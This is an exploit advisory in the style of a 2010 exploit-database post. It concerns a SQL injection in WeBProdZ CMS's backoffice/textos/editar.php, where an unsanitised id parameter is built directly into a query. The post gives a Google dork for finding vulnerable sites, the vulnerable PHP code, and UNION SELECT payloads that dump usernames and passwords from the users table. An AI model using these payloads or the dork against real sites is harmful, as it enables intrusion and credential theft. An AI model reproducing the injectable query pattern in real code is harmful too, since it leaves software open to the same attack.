WeBProdZ CMS SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WeBProdZ CMS SQL Injection Vulnerability
# Published : 2010-05-06
# Author : MasterGipy
# Previous Title : Factux LFI Vulnerability
# Next Title : REZERVI 3.0.2 Remote Command Execution Exploit

______                _       _   _             
      | ___               | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
      |    // _   / / _ | | | | | __| |/ _ | '_    
      | |   __/ V / (_) | | |_| | |_| | (_) | | | |   
      _| ____| _/ ___/|_|__,_|__|_|___/|_| |_| 

        _____                      _____  _____ 
       |_   _|                    |  _  ||  _  |
         | | ___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ / _` | '_ ` _   |  /| |____ |
         | |  __/ (_| | | | | | |  |_/ /.___/ /
         _/___|__,_|_| |_| |_|  ___/ ____/

_____________________________________________________________
   
[$] Exploit Title     : WeBProdZ CMS SQL Injection Vulnerability
[$] Date              : 06-05-2010            
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : SQL Injection Vulnerability
[$] Google Dork       : "Desenvolvido por WeBProdZ"

[$] Vulnerable code in /backoffice/textos/editar.php

<?php 
    include_once("../../ligacao/connDB.php");
    $sql = "select * from textos where idtextos=".$_GET["id"];
        
    $j2 = mysql_query($sql);
    $o=mysql_fetch_object($j2);
?>

[$] Exploit

[+] http://[site]/backoffice/textos/editar.php?id=1  <- SQL

[+] sql_1: -1 UNION ALL SELECT 1,2,3--
[+] sql_2: -1 UNION ALL SELECT 1,2,concat(username,char(58),password)+from+utilizadores--
[+] sql_3: -1 UNION ALL SELECT 1,2,concat(username,char(58),password_ori)+from+utilizadores--


[$] Greetings from PORTUGAL ^^